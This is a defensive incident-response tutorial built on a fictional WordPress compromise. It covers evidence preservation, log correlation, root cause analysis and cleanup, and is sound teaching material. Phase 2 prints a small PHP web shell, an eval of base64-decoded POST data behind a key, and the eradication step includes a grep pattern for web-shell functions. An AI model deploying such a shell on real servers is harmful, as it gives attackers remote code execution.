The first alert almost never tells you what actually happened. It just tells you that a rule tripped, a failed login threshold, a modified system file, or an outbound connection to an IP that your server has no business talking to. What it leaves out is whether you’re looking at a false positive, a minor blip, or the first thread of something much larger.
Incident response is about pulling on that thread. But you have to do it carefully. You can’t break it, you can’t tip off the attacker, and you can’t destroy the evidence you’ll need later. You just pull until you see the full picture, contain the damage, eradicate the threat, and make sure it can’t happen the same way again.
Having spent years working incidents, I’ve learned that the line between a controlled containment and an absolute disaster usually comes down to process. Not heroics, not flashy tooling, just process. The teams that survive incidents with their sanity intact are the ones with a repeatable approach they can execute calmly while everything around them is burning.
This article walks through that process as it actually unfolds. To keep things grounded, we’ll use a realistic composite scenario: a compromised WordPress site on a Linux VPS. It’s a fictional scenario, but every command, log line, and decision point reflects exactly how this work is done in the trenches.
Table of Contents
Open Table of Contents
- 1. The Incident Response Lifecycle
- 2. Phase 1 — Detection and the First Alert
- 3. Phase 2 — Triage and Scoping
- 4. Phase 3 — Containment Without Destroying Evidence
- 5. Phase 4 — Investigation and Forensic Timeline
- 6. Phase 5 — Root Cause Analysis
- 7. Phase 6 — Eradication and Recovery
- 8. Phase 7 — Lessons Learned and Prevention
- 9. The Incident Report
- References
1. The Incident Response Lifecycle
Before dropping into the scenario, we need a map. The incident response lifecycle is a well-established framework: NIST SP 800-61 Rev. 2 formalized it in four phases (now superseded by Rev. 3, which maps incident response to the CSF 2.0 functions), SANS breaks it into six (PICERL), and almost every security team follows some version of it. The seven phases below are an expanded working version of that same lifecycle. These phases aren’t strictly linear; you’ll constantly loop back as you uncover new details. But having this structure is what keeps you oriented when everything feels like it’s burning down.
flowchart LR
P1["🔔 Detection\nfirst alert\nidentify the signal"]
P2["🔍 Triage\nis it real?\nscope the impact"]
P3["🛡 Containment\nstop the spread\npreserve evidence"]
P4["🔬 Investigation\nbuild the timeline\nunderstand the attack"]
P5["🎯 Root Cause\nhow did they\nget in?"]
P6["🧹 Eradication\nremove access\nclean & recover"]
P7["📋 Lessons\nprevent recurrence\nimprove detection"]
P1 --> P2 --> P3 --> P4 --> P5 --> P6 --> P7
P7 -.->|"feeds back into\ndetection rules"| P1
style P1 fill:#1c2230,stroke:#58a6ff,color:#e6edf3
style P2 fill:#1a1a10,stroke:#e3b341,color:#e6edf3
style P3 fill:#2d1214,stroke:#f85149,color:#e6edf3
style P4 fill:#101a2a,stroke:#58a6ff,color:#e6edf3
style P5 fill:#1a1030,stroke:#a371f7,color:#e6edf3
style P6 fill:#1a3a22,stroke:#3fb950,color:#e6edf3
style P7 fill:#003d30,stroke:#00d4aa,color:#e6edf3
One non-negotiable principle underlies this entire process: every single action you take either preserves evidence or destroys it.
The natural instinct when you find a compromise is to panic-delete the malware, patch the hole, and move on. Resist that urge. The second you start deleting files or killing processes blindly, you lose the ability to figure out how they got there in the first place. And if you don’t understand the root cause, you haven’t actually fixed anything.
2. Phase 1 — Detection and the First Alert
Our scenario starts the way most do: with an alert that doesn’t immediately explain itself.
It’s 2:14 AM. A Wazuh alert fires:
{
"timestamp": "2025-06-03T02:14:33.122+0000",
"rule": {
"level": 10,
"description": "File integrity: PHP file added to uploads directory",
"id": "100020",
"mitre": { "id": ["T1505.003"], "technique": ["Web Shell"] }
},
"agent": { "name": "web-prod-01", "ip": "10.0.0.20" },
"syscheck": {
"path": "/var/www/html/wp-content/uploads/2025/06/about.php",
"event": "added",
"md5_after": "7c2e9f4a1b8d3e6f5a0c9b2d4e7f1a3c"
}
}
This is a high-signal alert. A PHP file appearing in the WordPress uploads directory is almost never legitimate, uploads should contain images and documents, not executable code. The MITRE mapping flags it as a possible web shell (T1505.003), which is exactly the kind of thing you want to know about at 2 AM.
Note: Wazuh doesn’t monitor web roots out of the box. This alert requires real-time FIM on the uploads directory in the agent’s
ossec.conf(inside<syscheck>), followed bysystemctl restart wazuh-agent, plus a custom rule (100020) that is a child of the built-in “file added” rule 554:<directories realtime="yes" check_all="yes">/var/www/html/wp-content/uploads</directories>
But here’s the discipline: one alert is a data point, not a conclusion. Before doing anything, the question is: is this real, and if so, how big is it?
What you do NOT do yet
- Don’t delete the file. It’s your first piece of evidence.
- Don’t reboot the server. You’ll lose volatile state (running processes, network connections, memory).
- Don’t immediately restore from backup. You don’t yet know when the compromise happened — you might restore a backup that’s already infected.
- Don’t log in and start poking around as root without a plan. Every command you run changes timestamps and shell history.
The first move is to start a contemporaneous log of your own actions. From this moment, everything you do gets timestamped and recorded.
# Become root first: most collection commands below require it
sudo -i
# Evidence directory outside /tmp (world-writable and wiped on reboot), root-only
umask 077
export EVIDENCE_DIR="/root/ir-evidence/$(date +%Y%m%d)"
mkdir -p "$EVIDENCE_DIR"
# Start an investigation log, every action from here is documented
# This protects you legally and helps reconstruct your own steps later
script -a -f "$EVIDENCE_DIR/ir-investigation-$(date +%Y%m%d-%H%M%S).log"
# Record the start time and context
echo "=== Incident investigation started: $(date -u) ==="
echo "Triggering alert: Wazuh rule 100020 — PHP in uploads"
echo "Investigator: Pablo H."
3. Phase 2 — Triage and Scoping
Triage answers two questions: Is this a true positive? and How far does it go? You’re trying to size the problem before you decide how to respond to it.
flowchart TD
A["🔔 Alert received\nPHP file in uploads"]
A --> B{{"Is the file\nactually malicious?"}}
B -->|"inspect contents"| C["Examine the file\nwithout executing it"]
C --> D{{"Confirmed\nweb shell?"}}
D -->|"no — false positive"| E["Document & close\ntune the rule"]
D -->|"yes — real"| F["Escalate to\nfull incident"]
F --> G["Scope the blast radius"]
G --> H["When was it created?"]
G --> I["Was it accessed?\nfrom what IPs?"]
G --> J["Are there other\nmalicious files?"]
G --> K["Any new users\nor processes?"]
H --> L["Build initial\ntimeline"]
I --> L
J --> L
K --> L
style A fill:#1c2230,stroke:#58a6ff,color:#e6edf3
style B fill:#1a1a10,stroke:#e3b341,color:#e6edf3
style D fill:#1a1a10,stroke:#e3b341,color:#e6edf3
style E fill:#1a3a22,stroke:#3fb950,color:#e6edf3
style F fill:#2d1214,stroke:#f85149,color:#e6edf3
style L fill:#101a2a,stroke:#58a6ff,color:#e6edf3
Inspect the file without executing it
# Look at the file metadata first, when, who, permissions
stat /var/www/html/wp-content/uploads/2025/06/about.php
# Read the contents WITHOUT executing, use cat/less, never run it
cat /var/www/html/wp-content/uploads/2025/06/about.php
In our scenario, the file contains:
<?php
// Obfuscated web shell which is a typical pattern
$x = base64_decode($_POST['data'] ?? '');
if (isset($_POST['key']) && $_POST['key'] === 'a7f3c9') {
eval($x);
}
?>
This is unambiguous. It’s a web shell and it accepts base64-encoded commands via POST request, gated behind a simple key, and executes them with eval(). This is a true positive. We’re now in a real incident.
Scope the timeline
The file’s creation time is the anchor point. Everything before it is potentially “how they got in,” everything after is “what they did.”
# Exact creation (Birth), modification and metadata-change times of the shell
stat /var/www/html/wp-content/uploads/2025/06/about.php | grep -E "Birth|Modify|Change"
# Find all files modified within a window around that time
# (attackers often drop multiple files in the same session)
find /var/www/html -type f -newermt "2025-06-03 01:00:00" \
! -newermt "2025-06-03 03:00:00" -ls 2>/dev/null
# Look specifically for other PHP files in uploads (more shells)
find /var/www/html/wp-content/uploads -name "*.php" -ls
# Check for recently modified core and theme files
find /var/www/html -name "*.php" -mtime -2 \
-not -path "*/cache/*" -ls 2>/dev/null
Check who accessed the shell
The web server access logs tell you whether the shell was actually used, and from where.
# Find all requests to the web shell in Nginx access logs
grep "about.php" /var/log/nginx/access.log
# Typical finding: the attacker's IP and activity:
# 203.0.113.45 - - [03/Jun/2025:02:16:01 +0000] "POST /wp-content/uploads/2025/06/about.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
# 203.0.113.45 - - [03/Jun/2025:02:18:44 +0000] "POST /wp-content/uploads/2025/06/about.php HTTP/1.1" 200 5678 "-" "Mozilla/5.0"
# Extract the attacker IP and see everything they touched
ATTACKER_IP="203.0.113.45"
grep "$ATTACKER_IP" /var/log/nginx/access.log | awk '{print $7, $9}' | sort | uniq -c
Now we have a better picture: a web shell was uploaded at 02:14, first accessed at 02:16 from IP 203.0.113.45, and used several times. This is an active, confirmed compromise. It is time to contain it.
4. Phase 3 — Containment Without Destroying Evidence
Containment is about stopping the bleeding while preserving the crime scene. The tension here is real: you want to lock the attacker out immediately, but you also need to capture the current state before it changes. The right sequence matters.
⚠️ The golden rule of containment
Capture volatile evidence before you change anything. Running processes, network connections, and memory state disappear the moment you reboot or kill processes. Once they’re gone, they’re gone.
Step 1 — Capture volatile state first
# One timestamp for the whole snapshot, so related files match
TS=$(date +%H%M%S)
# Snapshot running processes (the shell may have spawned something)
ps auxww > "$EVIDENCE_DIR/ir-processes-$TS.txt"
# Snapshot active network connections (is data being exfiltrated right now?)
# (ss replaces netstat, which isn't installed by default on Ubuntu 24.04)
ss -tunap > "$EVIDENCE_DIR/ir-connections-$TS.txt"
# Snapshot currently logged-in users
w > "$EVIDENCE_DIR/ir-sessions-$TS.txt"
who -a >> "$EVIDENCE_DIR/ir-sessions-$TS.txt"
# Capture the process tree to spot suspicious parent-child relationships
pstree -ap > "$EVIDENCE_DIR/ir-pstree-$TS.txt"
# Look for processes running from suspicious locations or deleted binaries
ls -la /proc/*/exe 2>/dev/null | grep -E "tmp|dev/shm|var/www|\(deleted\)"
Step 2 — Preserve evidence copies
# Copy the web shell and logs to a preserved location BEFORE any changes
mkdir -p /root/ir-evidence/$(date +%Y%m%d)
EVIDENCE_DIR="/root/ir-evidence/$(date +%Y%m%d)"
# Preserve the malicious file with its metadata
cp -p /var/www/html/wp-content/uploads/2025/06/about.php "$EVIDENCE_DIR/"
# Hash it for chain of custody
sha256sum /var/www/html/wp-content/uploads/2025/06/about.php >> "$EVIDENCE_DIR/hashes.txt"
# Preserve relevant logs, including rotated ones (copy, don't move — keep originals in place)
cp -p /var/log/nginx/access.log* /var/log/nginx/error.log* /var/log/auth.log* "$EVIDENCE_DIR/"
# If you can, take a full disk snapshot at the hypervisor/cloud level
# This is the gold standard — captures everything as-is
# (AWS: create EBS snapshot; DigitalOcean: create snapshot; Proxmox: backup)
Step 3 — Contain the access
flowchart LR
subgraph IMMEDIATE ["Immediate Containment"]
C1["Block attacker IP\nat firewall"]
C2["Neutralize the shell\nrename, don't delete"]
C3["Isolate if needed\nrestrict network"]
end
subgraph PRESERVE ["Evidence Preserved"]
P1["Volatile state\ncaptured"]
P2["Files + hashes\nsaved"]
P3["Disk snapshot\ntaken"]
end
PRESERVE --> IMMEDIATE
style IMMEDIATE fill:#2d1214,stroke:#f85149,color:#e6edf3
style PRESERVE fill:#1a3a22,stroke:#3fb950,color:#e6edf3
# Block the attacker's IP immediately (new connections)
ufw insert 1 deny from 203.0.113.45
# Or with iptables:
iptables -I INPUT 1 -s 203.0.113.45 -j DROP
# Firewall rules don't cut connections that are already ESTABLISHED (keep-alive)
# Kill any live sockets from the attacker:
ss -K dst 203.0.113.45
# Neutralize the web shell WITHOUT deleting it (preserve evidence in place)
# chmod 000 removes read access so the web server/PHP-FPM can't load it;
# renaming away from .php stops it from being routed to PHP at all
chmod 000 /var/www/html/wp-content/uploads/2025/06/about.php
mv /var/www/html/wp-content/uploads/2025/06/about.php \
/var/www/html/wp-content/uploads/2025/06/about.php.QUARANTINE
# Block PHP execution in uploads entirely (prevents other unknown shells)
# The location block must go INSIDE the server { } block and BEFORE the
# generic "location ~ \.php$" block: Nginx uses the first regex location
# that matches, in order of appearance. Appending it to the end of the
# file puts it outside server { } and "nginx -t" fails.
nano /etc/nginx/sites-available/yoursite.conf
# Add inside server { }, above "location ~ \.php$ { ... }":
#
# location ~* ^/wp-content/uploads/.*\.php$ {
# deny all;
# }
nginx -t && systemctl reload nginx
# Verify: any .php under uploads must now return 403
curl -sI https://yoursite.example/wp-content/uploads/test.php | head -1
At this point the immediate threat is contained: the attacker’s IP is blocked, the known shell is neutralized, and PHP execution in uploads is disabled. But we don’t yet know the full extent, that’s the investigation.
5. Phase 4 — Investigation and Forensic Timeline
This is the heart of incident response: reconstructing what actually happened, in what order, from the evidence. The output of this phase is a timeline, a chronological account of the attacker’s actions that lets you understand the full scope.
Build the timeline from multiple log sources
The key skill here is correlation, pulling events from different logs and ordering them into a single coherent narrative.
# ── Web server: full attacker activity ──────────────────
grep "203.0.113.45" /var/log/nginx/access.log | \
awk '{print $4, $6, $7, $9}' | sort
# ── Authentication: did they try SSH? did they succeed? ──
grep "203.0.113.45" /var/log/auth.log
# ── Look for the initial access vector BEFORE the shell ──
# What requests came from the attacker before 02:14?
awk '$4 >= "[03/Jun/2025:01:00:00" && $4 <= "[03/Jun/2025:02:15:00"' \
/var/log/nginx/access.log | grep "203.0.113.45"
# ── Check for privilege escalation attempts ─────────────
grep -E "sudo|su(\[[0-9]+\])?:" /var/log/auth.log | grep -E "02:(1[4-9]|2[0-9]|3[01]):"
# ── Find files created/modified during the attack window ─
find / -xdev -newermt "2025-06-03 02:00:00" \
! -newermt "2025-06-03 03:00:00" -type f 2>/dev/null | \
grep -vE "/proc|/sys|/var/log" | head -50
The reconstructed timeline
After correlating the logs, our scenario’s timeline takes shape:
flowchart TD
T1["01:47:22 — Attacker probes site\nGET /wp-json/wp/v2/users\nenumerates usernames"]
T2["01:52:10 — Vulnerability scan\nGET requests to known\nplugin paths, version checks"]
T3["02:03:55 — Exploit attempt\nPOST to vulnerable plugin\nfile-upload endpoint (CVE)"]
T4["02:14:33 — Shell uploaded\nabout.php written to uploads\nWazuh FIM alert fires"]
T5["02:16:01 — First shell access\nPOST executes whoami\nconfirms www-data context"]
T6["02:18:44 — Reconnaissance\nreads wp-config.php\nextracts DB credentials"]
T7["02:24:12 — Persistence attempt\ntries to write to\ntheme functions.php"]
T8["02:31:08 — Containment\nattacker IP blocked\nshell neutralized"]
T1 --> T2 --> T3 --> T4 --> T5 --> T6 --> T7 --> T8
style T1 fill:#1c2230,stroke:#58a6ff,color:#e6edf3
style T2 fill:#1c2230,stroke:#58a6ff,color:#e6edf3
style T3 fill:#1a1a10,stroke:#e3b341,color:#e6edf3
style T4 fill:#2d1214,stroke:#f85149,color:#e6edf3
style T5 fill:#2d1214,stroke:#f85149,color:#e6edf3
style T6 fill:#2d1214,stroke:#f85149,color:#e6edf3
style T7 fill:#1a1030,stroke:#a371f7,color:#e6edf3
style T8 fill:#1a3a22,stroke:#3fb950,color:#e6edf3
Assess what was accessed
The timeline reveals the attacker read wp-config.php which means the database credentials are compromised. This expands the scope: it’s not just a web shell, it’s a credential exposure.
# What's in wp-config.php that the attacker now has?
grep -E "DB_NAME|DB_USER|DB_HOST|DB_PASSWORD" \
/var/www/html/wp-config.php
# Check if those DB credentials are used anywhere else
# (credential reuse expands the blast radius)
# Run WP-CLI as the web server user, never as root: WP-CLI executes
# wp-config.php (and plugins/themes unless skipped), which may be attacker-modified
WP="sudo -u www-data wp --path=/var/www/html --skip-plugins --skip-themes"
# Check the database for signs of tampering (newest accounts first, any table prefix)
$WP user list --orderby=registered --order=DESC \
--fields=ID,user_login,user_email,user_registered --format=csv | head -11
# Look for injected admin users
$WP user list --role=administrator --fields=ID,user_login,user_email,user_registered
# Check for unexpected scheduled tasks (persistence)
$WP cron event list
crontab -l -u www-data 2>/dev/null
ls -la /etc/cron.d/ /var/spool/cron/crontabs/
systemctl list-timers --all
6. Phase 5 — Root Cause Analysis
This is the phase that separates a real incident response from a cleanup job, and it’s the part of my work I care about most. Cleaning up the shell stops the symptom. Root cause analysis answers the question that actually matters: how did they get in, and what made it possible?
If you skip this, you’re guaranteed to see the same attacker, or a different one using the same door coming back.
flowchart TD
SYMPTOM["🔴 Symptom\nWeb shell in uploads"]
SYMPTOM --> Q1{{"How was the file\nwritten?"}}
Q1 --> A1["Via plugin file-upload\nvulnerability — CVE-2025-XXXX\nin OutdatedPlugin v2.1"]
A1 --> Q2{{"Why was the\nplugin vulnerable?"}}
Q2 --> A2["Plugin was 8 months\nout of date — patch\nreleased 6 months ago"]
A2 --> Q3{{"Why wasn't it\nupdated?"}}
Q3 --> A3["No update process\nin place — updates\nwere manual & forgotten"]
A3 --> ROOT["🎯 ROOT CAUSE\nNo patch management process\n+ no monitoring of the\nuploads directory until\nWazuh was recently added"]
ROOT --> FIX["Fix the process,\nnot just the file"]
style SYMPTOM fill:#2d1214,stroke:#f85149,color:#e6edf3
style ROOT fill:#1a1030,stroke:#a371f7,color:#e6edf3
style FIX fill:#1a3a22,stroke:#3fb950,color:#e6edf3
style A1 fill:#1c2230,stroke:#58a6ff,color:#e6edf3
style A2 fill:#1c2230,stroke:#58a6ff,color:#e6edf3
style A3 fill:#1c2230,stroke:#58a6ff,color:#e6edf3
The “five whys” applied to this incident
The technique is simple, keep asking “why” until you reach something systemic rather than incidental:
- Why was there a web shell? Because an attacker exploited a file-upload vulnerability in an outdated plugin.
- Why was the plugin vulnerable? Because it hadn’t been updated in 8 months, and the vulnerability was patched 6 months ago.
- Why hadn’t it been updated? Because updates were handled manually and this site wasn’t on a maintenance schedule.
- Why wasn’t it on a schedule? Because no patch management process existed for this client’s sites.
- Why did no process exist? Because security maintenance was treated as reactive, not as an ongoing operational practice.
The root cause isn’t “an outdated plugin.” That’s the proximate cause. The root cause is the absence of a patch management process. Fix only the plugin and the next vulnerable plugin opens the same door. Fix the process and you close the entire category of attack.
Confirm the root cause with evidence
# Confirm the entry vector — find the exploit request in logs
grep -iE "POST.*(outdated-plugin|upload)" /var/log/nginx/access.log | \
grep "203.0.113.45"
# Confirm the plugin version that was running (as www-data, not root)
WP="sudo -u www-data wp --path=/var/www/html --skip-plugins --skip-themes"
$WP plugin get outdated-plugin --field=version
# Cross-reference against the CVE database to confirm vulnerability
# (manually verify at https://wpscan.com/plugins or NVD)
# Check how many OTHER plugins are also out of date
# (the same root cause likely affects more than one)
$WP plugin list --update=available
7. Phase 6 — Eradication and Recovery
Now, after we understand the full scope we proceed to clean up. Eradication done before investigation is how you end up with reinfections, because you cleaned what you could see and missed what you couldn’t.
flowchart LR
subgraph ERADICATE ["Eradication"]
E1["Remove all shells\n& backdoors found"]
E2["Reset ALL credentials\nDB, admin, SSH keys"]
E3["Patch the root cause\nupdate vulnerable plugin"]
E4["Verify core integrity\nwp core verify-checksums"]
end
subgraph RECOVER ["Recovery"]
R1["Restore clean files\nif needed from\npre-incident backup"]
R2["Re-enable services\nmonitor closely"]
R3["Validate functionality\n& confirm clean"]
end
subgraph VERIFY ["Verification"]
V1["Re-scan for shells"]
V2["Watch logs 48-72h"]
V3["Confirm no\nreinfection"]
end
ERADICATE --> RECOVER --> VERIFY
style ERADICATE fill:#1a3a22,stroke:#3fb950,color:#e6edf3
style RECOVER fill:#101a2a,stroke:#58a6ff,color:#e6edf3
style VERIFY fill:#003d30,stroke:#00d4aa,color:#e6edf3
Eradication checklist
# ── 1. Remove all identified malicious files
# (we preserved copies in evidence already)
# Search comprehensively for web shells one more time
grep -rlE --include="*.php" \
'eval\s*\(\s*\$|base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)|(system|passthru|shell_exec|popen|proc_open|assert)\s*\(\s*\$_' \
/var/www/html 2>/dev/null
# Remove the quarantined shell from the web root (a copy is already in evidence)
mv /var/www/html/wp-content/uploads/2025/06/about.php.QUARANTINE "$EVIDENCE_DIR/"
# ── 2. Reset ALL potentially compromised credentials
# Database password (attacker read wp-config.php)
# Generate new DB password (hex avoids quoting/escaping issues in SQL and PHP)
NEW_DB_PASS=$(openssl rand -hex 24)
mysql -u root -e "ALTER USER 'wp_user'@'localhost' IDENTIFIED BY '$NEW_DB_PASS';"
# Update wp-config.php immediately, or the site goes down with
# "Error establishing a database connection" (wp config doesn't load WordPress)
wp config set DB_PASSWORD "$NEW_DB_PASS" --path=/var/www/html --allow-root
unset NEW_DB_PASS
# Reset all WordPress admin passwords and email each admin a reset notice
# (use --show-password instead if the server can't send mail)
WP="sudo -u www-data wp --path=/var/www/html --skip-plugins --skip-themes"
$WP user reset-password $($WP user list --role=administrator --field=ID)
# Regenerate WordPress authentication salts (invalidates all sessions/cookies)
wp config shuffle-salts --path=/var/www/html --allow-root
# Rotate SSH keys if there was any chance of host access
# ── 3. Verify integrity BEFORE updating (an update overwrites modified
# files and hides what the attacker changed)
WP="sudo -u www-data wp --path=/var/www/html --skip-plugins --skip-themes"
$WP core verify-checksums
$WP plugin verify-checksums --all
# ── 4. Patch the root cause (as the user that owns the WordPress files, not root)
$WP plugin update outdated-plugin
$WP plugin update --all
$WP core update
Recovery decision: clean in place or restore from backup?
This is a judgment call that depends on your confidence in the investigation:
| Scenario | Recommended approach |
|---|---|
| Single shell, clear timeline, no core file modifications | Clean in place — you understand the full scope |
| Multiple backdoors, modified core files, unclear timeline | Restore from a known-clean backup predating the compromise |
| Any sign of root-level compromise | Rebuild the server from scratch — don’t trust anything |
🔴 When in doubt, rebuild
If there’s any indication the attacker gained root (not just www-data), the only safe option is to rebuild from scratch on a fresh server, then restore only validated data. A root-level compromise means you can’t trust any binary or file on the system, including the tools you’d use to verify it’s clean.
In our scenario, the attacker was confined to the www-data context (the web shell ran as the web server user, and auth.log shows no successful sudo or su from that account). The timeline is clear and complete. This makes cleaning in place a reasonable choice — but we still restore the theme’s functions.php (the target of the 02:24 persistence attempt) from backup to be certain.
8. Phase 7 — Lessons Learned and Prevention
The incident isn’t over when the server is clean. It’s over when you’ve made sure it can’t happen the same way again, and when you’ve improved your ability to detect it faster next time.
This phase closes the loop back to detection. Everything you learned becomes a new control, a new detection rule, or an improved process.
flowchart TD
INCIDENT["📋 What we learned\nfrom this incident"]
INCIDENT --> L1["Root cause:\nno patch management"]
INCIDENT --> L2["Detection worked\nbut was reactive"]
INCIDENT --> L3["uploads/ allowed\nPHP execution"]
INCIDENT --> L4["No 2FA on\nadmin accounts"]
L1 --> F1["✅ Implement automated\nplugin updates +\nweekly review"]
L2 --> F2["✅ Add detection rules\nfor exploit patterns\nnot just shells"]
L3 --> F3["✅ Block PHP in uploads\npermanently — already done\nduring containment"]
L4 --> F4["✅ Enforce 2FA on\nall admin accounts +\nserver-level Fail2ban"]
F1 --> BETTER["🛡 Stronger posture\n+ faster detection"]
F2 --> BETTER
F3 --> BETTER
F4 --> BETTER
style INCIDENT fill:#1a1030,stroke:#a371f7,color:#e6edf3
style BETTER fill:#003d30,stroke:#00d4aa,color:#e6edf3
style F1 fill:#1a3a22,stroke:#3fb950,color:#e6edf3
style F2 fill:#1a3a22,stroke:#3fb950,color:#e6edf3
style F3 fill:#1a3a22,stroke:#3fb950,color:#e6edf3
style F4 fill:#1a3a22,stroke:#3fb950,color:#e6edf3
Turn the incident into better detection
One of the most valuable outputs is a new detection rule that would have caught this earlier, at the exploit stage rather than the shell-upload stage.
<!-- /var/ossec/etc/rules/local_rules.xml -->
<!-- New rules: detect the exploit pattern BEFORE shell upload -->
<group name="local,wordpress,custom">
<!-- Detect WordPress user enumeration (REST API or ?author=) -->
<rule id="100029" level="5">
<if_group>web</if_group>
<url>/wp-json/wp/v2/users|?author=</url>
<description>WordPress user enumeration attempt</description>
<group>wordpress_enum,</group>
</rule>
<!-- Detect POST requests to known vulnerable plugin endpoints -->
<!-- MITRE T1190: Exploit Public-Facing Application -->
<rule id="100030" level="12">
<if_group>web</if_group>
<url>outdated-plugin/upload</url>
<regex>POST</regex>
<description>Exploit attempt against known vulnerable plugin upload endpoint</description>
<mitre>
<id>T1190</id>
</mitre>
</rule>
<!-- Enumeration followed by an exploit attempt from the same IP (attack chain) -->
<rule id="100031" level="14" timeframe="3600">
<if_sid>100030</if_sid>
<if_matched_group>wordpress_enum</if_matched_group>
<same_srcip />
<description>Attack chain: user enumeration followed by exploit attempt from same IP</description>
<mitre>
<id>T1190</id>
</mitre>
</rule>
</group>
Validate the rules with a sample log line, then restart the manager to load them:
sudo /var/ossec/bin/wazuh-logtest
sudo systemctl restart wazuh-manager
The prevention controls that came out of this incident
This is where the previous articles in this series connect directly:
- Patch management process: automated plugin/core updates plus a weekly manual review. This is the root-cause fix.
- Server-level hardening: PHP execution blocked in uploads, file integrity monitoring on critical paths (the FIM rule that caught this is a keeper).
- Credential hygiene: 2FA enforced on all admin accounts, strong unique passwords, xmlrpc.php blocked.
- Better detection: new rules that catch the exploit stage, not just the post-exploitation stage.
- Backup validation: confirmed the pre-incident backup was clean and restorable, with a documented restore runbook.
9. The Incident Report
The final deliverable is the incident report. Like the vulnerability assessment reports discussed in the previous article, an incident report is only valuable if it communicates clearly to the people who need to act on it, which usually includes non-technical stakeholders.
A useful incident report has this structure:
flowchart TD
subgraph REPORT ["Incident Report Structure"]
S1["1. Executive Summary\nWhat happened, impact,\ncurrent status — plain language"]
S2["2. Timeline\nChronological account\nof attacker actions"]
S3["3. Impact Assessment\nWhat was accessed,\nwhat was at risk"]
S4["4. Root Cause\nHow they got in\n+ why it was possible"]
S5["5. Response Actions\nWhat we did\n& when"]
S6["6. Remediation\nWhat's fixed +\nwhat's still pending"]
S7["7. Recommendations\nPrevent recurrence"]
end
S1 --> S2 --> S3 --> S4 --> S5 --> S6 --> S7
style REPORT fill:#1c2230,stroke:#58a6ff,color:#e6edf3
style S1 fill:#003d30,stroke:#00d4aa,color:#e6edf3
style S4 fill:#1a1030,stroke:#a371f7,color:#e6edf3
Example executive summary
The executive summary is what most stakeholders will actually read. Write it for a business owner, not a security engineer:
Executive Summary
On June 3rd at approximately 2:14 AM, our monitoring detected unauthorized code uploaded to the company website. Investigation confirmed that an attacker exploited a known vulnerability in an outdated WordPress plugin to upload a “web shell”, a tool that allowed them to run commands on the server.
The attacker had access for approximately 17 minutes before being blocked. During that time, they read the website’s database configuration file, which means the database password should be considered compromised (it has since been changed). There is no evidence that customer data was downloaded or that the attacker gained deeper access to the server beyond the website itself.
The website is now clean and secured. The underlying cause, a plugin that was not kept up to date, has been addressed both for this specific plugin and through a new automated update process that prevents this category of issue going forward. Three additional preventive measures have been implemented. No further action is required from your team; this summary is for your awareness.
That’s an executive summary a non-technical client can read, understand, and feel informed by. It answers their real questions: what happened, how bad is it, is it fixed, and what are you doing to prevent it.
Incident response done well is unglamorous and methodical. It’s not the dramatic keyboard-mashing of movies, it’s careful evidence preservation, patient log correlation, honest root cause analysis, and clear communication. The teams and practitioners who handle incidents well aren’t the ones with the fanciest tools. They’re the ones with a process they can execute calmly while the pressure is on.
And the single most important part of that process is the part everyone is tempted to skip: root cause analysis. Cleaning the shell makes the alert go away. Understanding why the shell was possible makes the next shell impossible. That’s the difference between responding to incidents forever and actually reducing how often they happen.
If you take one thing from this: when you find a compromise, resist the urge to immediately delete and move on. Slow down. Preserve the evidence. Understand the full story. Then fix the root cause, not just the symptom. That discipline is what turns a recurring nightmare into a closed chapter.
References
- NIST SP 800-61 Rev. 3 — Incident Response Recommendations and Considerations for Cybersecurity Risk Management
- NIST SP 800-61 Rev. 2 — Computer Security Incident Handling Guide (withdrawn, historical reference)
- SANS Incident Handler’s Handbook
- MITRE ATT&CK Framework
- Wazuh Incident Response Documentation
- The DFIR Report — Real Intrusion Analyses
Written by Pablo Huertas - Cybersecurity Specialist & Technical Writer
19 years in enterprise security operations and incident response management.